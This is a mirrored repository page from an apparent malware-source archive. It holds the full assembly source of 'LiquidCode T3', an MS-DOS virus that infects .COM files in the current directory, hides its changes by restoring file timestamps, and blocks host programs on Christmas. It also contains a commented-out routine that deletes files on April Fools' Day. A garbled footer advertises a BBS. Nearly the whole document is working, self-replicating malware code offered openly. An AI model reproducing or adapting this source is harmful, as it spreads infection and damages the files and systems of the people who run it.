Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-28 18:02:48 +00:00
Code Releases Activity
c503817068
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.t3.asm
vxunderground 3e7d2e8262
Add files via upload
2021-01-12 18:01:59 -06:00

362 lines
5.5 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;LiquidCode --- T3
;
; Virus
;This version:
;Searches current directory for non-infected com files, if any found
;it will become infected!
;This virus has a routine which self-destructs itself and uninfects
;the file.
assume cs:code
.286
code segment "code"
org 0100h
start proc
jmp v_start ;first 5 bytes |
nop ; |
nop ; |
v_start:
call $+3 ;Actual virus
pop dx
sub dx, 3
push dx ;save relocation factor in BP
pop bp ;so virus can be copied anywhere twoards
mov si, dx ;the end of the file
;
; Replace first 5 bytes in memory with original
; program code so normal program can run later
add si, first_five
mov di, 0100h
mov cx, 5
lodsb
stosb
loop $-2
;see if user want to disinfect this file
; mov si, 82h
; lodsb
; cmp al, "[" ;is al the code to disinfect? "["
; jne ok_dont_disinfect
; jmp self_kill
ok_dont_disinfect:
;here should be date checks to see
;if an evil function should be unleashed!!
mov ah, 2ah
int 21h
;cx year 1980-2099
;dh month 1-12
;dl day
;al day of week 0=sun 1=mon -> 7=sat
cmp dh, 12
jne notdec
cmp dl, 25
jne notdec
jmp christmas
notdec:
cmp dh, 4
jne notapril
cmp dl, 1
jne notapril
; jmp aprilfools
notapril:
;Set the DTA
call set_dta
;find first file to ?infect?
call find_first_file
go_again:
mov si, bp
add si, size_
lodsw
cmp ax, 5
ja gd4
jmp resrch
gd4:
call open_file
mov bx, ax
mov al, 0
call date_time
mov ah, 3fh
mov cx, 5
mov dx, bp
add dx, first_five
int 21h
;**** mov ax, 4202h
mov cx, 0
mov ax, 4202h
mov dx, cx
int 21h
sub ax, 3
mov si, bp
add si, new_5
mov [si+1], ax
mov si, bp
mov di, si
add si, chkmark
add di, mark
mov cx, 2
repe cmpsb
jne INFECT
;File found was previously infected!
; search for new one now.
jmp resrch
wipe_name:
push di
push ax
push cx
mov di, bp
add di, name_
mov cx, 13
mov al, 0
rep stosb
pop cx
pop ax
pop di
ret
resrch:
call wipe_name
mov ah, 4fh
int 21h
jnc gd3
jmp term_virus
gd3:
jmp go_again
INFECT:
;Time to infect the file!!
mov si, bp
add si, handle
mov bx, [si]
mov cx, vsize
mov dx, bp
call wipe_name
mov ax, 4000h
int 21h
mov ax, 4200h
mov cx, 0
mov dx, cx
int 21h
mov dx, bp
add dx, new_5
mov ax, 4000h
mov cx, 5
int 21h
mov al, 1
call date_time
mov ax, 3e00h
int 21h
jmp resrch
fndnam proc
mov si, env
mov ax, [si]
mov es, ax
mov ds, ax
mov si, 0
mov di, si
__lp:
lodsb
cmp al, 0
je chknxt
stosb
jmp __lp
chknxt:
stosb
lodsb
cmp al, 0
je fnd1
stosb
jmp __lp
fnd1:
stosb
__lp2:
lodsb
cmp al, "a"
jae ff_
up2:
cmp al, "A"
jae fff_
up3:
stosb
jmp __lp2
ff_:
cmp al,"z"
jbe fnd
jmp up2
fff_:
cmp al, "Z"
jbe fnd
jmp up3
fnd:
mov si, di
mov al, 0
repne scasb
mov dx, si
mov di, dx
ret
env equ 2ch
fndnam endp
self_kill:
;this procedure disinfects specified files
;SI points to the name of current file on disk
;which is infected
call fndnam ;find name of current file from env block in memory
jmp gd__
abrt:
int 20h
gd__:
mov ax, 3d02h
int 21h
jc abrt
mov bx, ax
mov ax, cs
mov ds, ax
mov es, ax
mov cx, 5
mov dx, bp
add dx, first_five
call wipe_name
mov ax, 4000h
int 21h
jc abrt
mov dx, 0
mov cx, 0
mov ax, 4202h
int 21h
jnc gd__1
jmp abrt
gd__1:
sub ax, vsize
mov dx, ax
mov cx, 0
mov ax, 4200h
int 21h
call wipe_name
mov cx, 0
mov ax, 4000h
int 21h
mov ax, 3e00h
int 21h
jmp term_virus
date_time:
pusha
mov ah, 57h
cmp al, 0
je fnd__$
mov di, bp
mov si, di
add di, date
add si, time
mov dx, [di]
mov cx, [si]
int 21h
jmp ret__
fnd__$:
int 21h
mov si, bp
mov di, bp
add si, time
add di, date
mov [si], cx
mov [di], dx
ret__:
popa
ret
open_file:
mov dx, bp
add dx, name_
mov ax, 3d02h
int 21h
jnc gd2
jmp term_virus
gd2:
mov si, bp
add si, handle
mov [si], ax
ret
find_first_file:
mov dx, bp
mov cx, 0
mov ah, 4eh
add dx, all_com_files
int 21h
jnc gd1
jmp term_virus
gd1:
ret
set_dta:
mov dx, bp
mov ah, 1ah
add dx, dta
int 21h
ret
term_virus:
mov ax, 0
mov bx, ax
mov cx, bx
mov dx, cx
mov si, 0100h
mov di, -1
mov bp, di
push 0100h
ret
CHRISTMAS:
;Program Lockup
; Exit without running program
int 20h
;APRILFOOLS:
;Ha Ha delete current file
; call fndnam
; mov ah, 41h
; int 21h
; mov ax, cs
; mov ds, ax
; mov es, ax
; jmp term_virus
; Data Bank
_fstfive:
int 20h
nop
ckmrk:
nop
nop
acf db "*.COM",0
dt_ dw 0
tme dw 0
d_t_a:
rfd db 21 dup (0)
att db 0
dw 0
dw 0
sz dd 0
n_me db 13 dup (0),0
handl dw 0
nw_5 db 0e9h,0,0
mrk db "<T3> "
strain db "<tm>LiquidCode 92"
;
end___:
first_five = offset _fstfive-0105h
all_com_files = offset acf-0105h
dta = offset d_t_a-0105h
attribute = offset att-0105h
time = offset tme-0105h
date = offset dt_-0105h
size_ = offset sz-0105h
name_ = offset n_me-0105h
handle = offset handl-0105h
new_5 = offset nw_5-0105h
mark = offset mrk-0105h
chkmark = offset ckmrk-0105h
vsize = offset end___-0105h
start endp
code ends
end start

; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
View Git Blame Copy Permalink